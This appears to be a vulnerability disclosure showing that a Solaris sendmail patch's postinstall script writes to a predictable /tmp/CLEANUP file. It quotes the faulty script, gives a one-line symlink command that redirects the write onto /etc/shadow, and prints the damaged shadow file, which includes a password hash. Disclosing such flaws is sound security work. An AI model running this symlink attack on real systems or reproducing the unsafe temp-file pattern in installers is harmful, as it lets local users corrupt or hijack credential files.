@_larry0

147147-26 patch creates CLEANUP file in /tmp


/sbin/sh:root@dev-unix-sec02# cat CLEANUP
EXISTING_FILE_PRESERVED: /var/run/.patchSafeMode/root/etc/security/audit_event /var/run/.patchSafeMode/root/etc/security/audit_event.new
EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/sendmail.cf /var/run/.patchSafeMode/root/etc/mail/sendmail.cf.old
EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/submit.cf /var/run/.patchSafeMode/root/etc/mail/submit.cf.old

Sendmail has been upgraded to version 8.14.5 .
After you reboot, you may want to run
        /usr/sbin/check-hostname
and
        /usr/sbin/check-permissions ALL
These two shell-scripts will check for common
misconfigurations and recommend corrective
action, or report if things are OK.


-rw-r--r--   1 root     other        662 Mar 27 13:03 CLEANUP


Problem code in ./SUNWsndmu/install/postinstall:

   540  CLEANUP=/tmp/CLEANUP
   541
   542  if [ &quot;x$UPDATE&quot; = xyes ]; then
   543          VERSION=`grep &#39;^DZ&#39; $PKG_INSTALL_ROOT/etc/mail/sendmail.cf | \
   544                  sed -e s/DZ//`
   545          echo &quot;\nSendmail has been upgraded to version $VERSION .&quot; &gt;&gt;$CLE
ANUP
   546          echo &quot;After you reboot, you may want to run&quot; &gt;&gt;$CLEANUP
   547          echo &quot;\t/usr/sbin/check-hostname&quot; &gt;&gt;$CLEANUP
   548          echo &quot;and&quot; &gt;&gt;$CLEANUP
   549          echo &quot;\t/usr/sbin/check-permissions ALL&quot; &gt;&gt;$CLEANUP
   550          echo &quot;These two shell-scripts will check for common&quot; &gt;&gt;$CLEANUP
   551          echo &quot;misconfigurations and recommend corrective&quot; &gt;&gt;$CLEANUP
   552          echo &quot;action, or report if things are OK.\n&quot; &gt;&gt;$CLEANUP
   553  fi


A simple attack in /tmp 

ln -s /etc/shadow CLEANUP

Will over write the contents of /etc/shadow.

# cat /etc/shadow
root:x:15540::::::
daemon:x:1:1:::::
bin:x:2:2:::::
sys:x:3:3:::::
adm:x:4:4:::::
lp:x:71:8:::::
uucp:x:5:5:::::
nuucp:x:9:9:::::
smmsp:x:25:25:::::
listen:x:37:4:::::
gdm:x:50:50:::::
webservd:x:80:80:::::
postgres:x:90:90:::::
svctag:x:95:12:::::
unknown:*LK*:::::::
nobody:x:60001:60001:::::
noaccess:x:60002:60002:::::
nobody4:x:65534:65534:::::
oracle:x:54321:54321:::::
larry:KzNeyKmIHycjs:15540::::::
smmsp:NP:6445::::::
EXISTING_FILE_PRESERVED: /etc/apache/tomcat.conf /etc/apache/tomcat.conf.new
EXISTING_FILE_PRESERVED: /var/apache/tomcat55/conf/catalina.policy /var/apache/tomcat55/conf/catalina.policy.new
EXISTING_FILE_PRESERVED: /var/apache/tomcat55/conf/web.xml /var/apache/tomcat55/conf/web.xml.new
</pre>